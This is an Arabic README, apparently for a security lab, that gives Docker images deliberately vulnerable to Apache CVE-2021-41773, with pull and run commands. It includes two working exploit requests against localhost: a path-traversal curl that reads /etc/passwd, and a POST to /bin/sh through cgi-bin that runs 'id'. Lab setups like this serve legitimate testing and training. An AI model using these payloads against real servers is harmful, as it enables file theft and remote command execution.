
صور Docker معرضة للثغرات لـ CVE-2021-41773
تنطبق هذه الثغرة فقط على الإصدار 2.4.49 مع إعدادات محددة غير افتراضية. في حالات معينة، يمكن أن تؤدي إلى قراءة ملفات أو تنفيذ أوامر.
https://twitter.com/ptswarm/status/1445376079548624899
يمكن سحب الحاويات مباشرة من Docker Hub باستخدام
docker pull blueteamsteve/cve-2021-41773:no-cgid
وتشغيلها باستخدام
docker run -dit -p 8080:80 blueteamsteve/cve-2021-41773:no-cgid
يمكن عرض سجلات Apache باستخدام الأمر أدناه، أو ببساطة استبعاد -dit من أمر التشغيل أعلاه لتدفق stdio
docker logs <container-id>
curl http://localhost:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd
يمكن سحب الحاويات مباشرة من Docker Hub باستخدام
docker pull blueteamsteve/cve-2021-41773:with-cgid
وتشغيلها باستخدام
docker run -dit -p 8080:80 blueteamsteve/cve-2021-41773:with-cgid
يمكن عرض سجلات Apache باستخدام الأمر أدناه، أو ببساطة استبعاد -dit من أمر التشغيل أعلاه لتدفق stdio
docker logs <container-id>
curl 'localhost:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh' -d 'A=|echo;id'
قم بتعديل وبناء نسخك الخاصة باستخدام ملف dockerfile وملفات httpd.conf القالب في المجلدات الفرعية
./no-cgi للإعداد القابل للاستغلال لقراءة الملفات./with-cgi للإعداد القابل للاستغلال لتنفيذ الأوامر